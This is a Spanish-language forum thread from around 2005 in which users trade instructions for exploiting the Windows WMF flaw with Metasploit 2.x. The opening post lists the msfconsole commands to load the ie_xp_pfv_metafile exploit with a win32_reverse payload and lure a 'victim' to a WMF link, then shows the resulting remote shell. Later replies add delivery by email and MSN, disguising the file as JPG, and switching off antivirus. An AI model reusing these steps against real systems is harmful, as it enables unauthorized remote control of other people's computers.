 Autor
|
Tema: [Patched] - Explotando WMF para Windows con MetaSploit (!¡) (Leído 13,053 veces)
|
loco5
 Desconectado
Mensajes: 217
¡Amo YaBB SE!
|
hola a todos ya me va eso para empezar hay que bajar el metasploit yo por jemeplo he bajado la version 2.4 despues hay que user msfupdate dos veces porque dos veces?la primera vez para hacer update al mimso fihcer msfupdate y la seconda vez para hacer update de los exploit inclyuendo nuetrso expeloit ese liego it al fihcier msfconsole msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > set LHOST mi ip LHOST -> mi ip msf ie_xp_pfv_metafile(win32_reverse) >exploit aqui hay que esperar que alguna vistima se consteta a tu pc con el puersto 8080 para que se infecte y te devuele el shell poe ejmple os abries el ixplorer y poneis http://tuip:8080/foto.wmf ya verais que os saldra el shell - HTTP Client connected from 192.168.0.219:1060 using Windows XP
- Got connection from 200.168.0.2:4321 <-> 200.168.0.219:1061
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\XXXX\Desktop> ahora me pregunta aqui si algain conoce eso de metasploit que cambie le payload de win32_reverse para un win32_exec para que ejecuta un fichero diretament de una pagina web saludos |
|
|
|
|
En línea
|
|
|
|
|
|
sulrun
Desconectado
Mensajes: 33
|
Bueno he segido probando y casi lo hago funcionar, cuando intento conectar desde mi mismo ordenador me que tengo conexion pero justo despues me aparece: y se me cierra  |
|
|
|
« Última modificación: 30 Diciembre 2005, 17:33 por sulrun »
|
En línea
|
|
|
|
|
Man-In-the-Middle
|
Esto sirve para generar y guardar el archivo wmf
Ojo que este testeo, solo corre en xp/win2003, y como yo tengo win2000 no me shell, pero tambien se puede jugar en win2000, pero te pide permiso para ejecutar el archivo
Pasos
|
|
|
|
« Última modificación: 30 Diciembre 2005, 17:31 por Man-In-the-Middle »
|
En línea
|
|
|
|
sulrun
Desconectado
Mensajes: 33
|
Lo de guardar el archivo esta muy bien, tb me he dado cuenta de que modificando la extension por un jpg tambien funciona, pero sigo teniendo el mismo problema de:
[ *] Exiting Reverse Handler
|
|
|
|
|
En línea
|
|
|
|
exploitman
Visitante
|
Dusculpen la ignorancia entonces yo dejo mi pc como server web y intrudusco cualquier archivo .wmf y le digo a cualquier perosona que entre y me enviara el reverse shell dejando en
el exploit con la opcion LHOST y listo ?¿? o esta mal
|
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
despues hay que user msfupdate dos veces porque dos veces?la primera vez para hacer update al mimso fihcer msfupdate y la seconda vez para hacer update de los exploit inclyuendo nuetrso expeloit ese
Eso era lo que me faltaba que me explicaran XD, claro que no me reconoce el comando msfupdate, ni: update, update msf, ni update nada. Tengo la version 2.3. Problema solucionado, la version era muy vieja.
|
|
|
|
« Última modificación: 30 Diciembre 2005, 20:14 por SeniorX »
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
ok miren estoy haciendo pruebas en mi red local:  EXITO!!! Lo logre   Podria hacer un video para mostrar mas facilmente como se hace NOTA!: Mi otro pc tiene virusScan y detecto el intento de intrusion, por lo tanto para lograr mi meta tuve que desactivar el antivirus. |
|
|
|
« Última modificación: 30 Diciembre 2005, 20:52 por SeniorX »
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
ZyrroX
Desconectado
Mensajes: 38
|
Conseguido al final tambien! Por fin... si lo he intentado unas 50 veces jejejeje  |
|
|
|
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
Man-In-the-Midle: te contesto por aca lo q me preguntaste: Cualquier aplicación que muestre una imagen de formato WMF causará que la máquina del usuario se infecte, esto incluye al Windows Explorer (viendo una imagen infectada que esté en el HD), Internet Explorer (automáticamente visitando una web que contenga una imagen de este tipo), Firefox (en versiones antiguas es vulnerable porque abre los archivos WMF por defecto con el "Windows Picture and Fax Viewer", la versión 1.5 abre estos archivos por defecto con el Windows Media Player, que no es vulnerable, aunque no muestra la imagen), Opera (8.51 y posiblemente inferiores, es vulnerable porque abre los WMF con el "Windows Picture and Fax Viewer"), aunque tanto el Firefox como Opera preguntan al usuario antes de mostrar la imagen. Fuente:cyruxnet ahora en cuanto al bug, veo que se avanzo mucho en su analisis y explotacion, Man-In-the-Midle aporto excelente info y loco5 hizo un buen trabajo, al igual que los demas, los felicito!!!. Por otro lado, este bug tambien se puede explotar via mail y MSN, creando para ello la imagen, con cualquier editor de imagenes que soporte WMF e introducir en ella el codigo que quieran que se ejecute, inclusive como se dijo se puede cambiar la extension del archivo por JPG o GIF Salu2 Boys! y happy new year... |
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
hice un video para el que todavia no logra explotar: aca el link |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
BRAVO!!!! ya esta aprendido y ahora a portarse bien    salu2 boys!!! y happy new year... PD:cualquier cosa ando por mi blog...XD |
|
|
|
|
En línea
|
|
|
|
|
G3r4rD
|
Alguien ha intentado ejecutar el exploit con la PAYLOAD win32_exec? en teoria es valida pero no ejecuta nada lo he probado con un comando "tftp -i ......" "cmd.exe".... de todo y no ejecuta nada, las otras PAYLOAD me han ido bien
|
|
|
|
|
En línea
|
|
|
|
|
parisnet
|
Feliz año, que sea un año de muchos remote execute comand, con privilegios de sistema para todos!
Bueno primero que nada, creo que el Metasploit nos va a hacer la vida mas facil a todos en cuanto a ahorrar compilar y los famosos errores.. Veo a esta herramienta como un futuro estandar tipo Nmap o Nc.
Y... me parece demasiado que tengan que poner a hacer tutoriales didacticos, yo lei el UserGuide.pdf y probe y bueno resulto muy facil todo, ya lo entiendo aproximadamente.
Hasta ahora no funciono pero creo que es porque baje la version 2.3 del Metaploit, ademas porque las pantallas de ustedes dicen cosas que no la mia... Pero les cuento con esta version lo que hizo el exploit
Fue crear un servidor HTTP y cuando recibia una conexion enviar un archivo de muy largo nombre, con extensión .JPG
Bueno lo pruebo y les cuento ADioS!
|
|
|
|
|
En línea
|
|
|
|
Neobius
Desconectado
Mensajes: 2.082
Viva Linux!
|
A mi me lo detecta el antivirus
|
|
|
|
|
En línea
|
 Todos somos muy ignorantes, lo que ocurre es que no todos ignoramos lo mismo. Albert Einstein Recuerda: El arca de Noe fue construida por aficionados, el titanic por profesionales http://neobius.blogspot.com |
|
|
|
 |
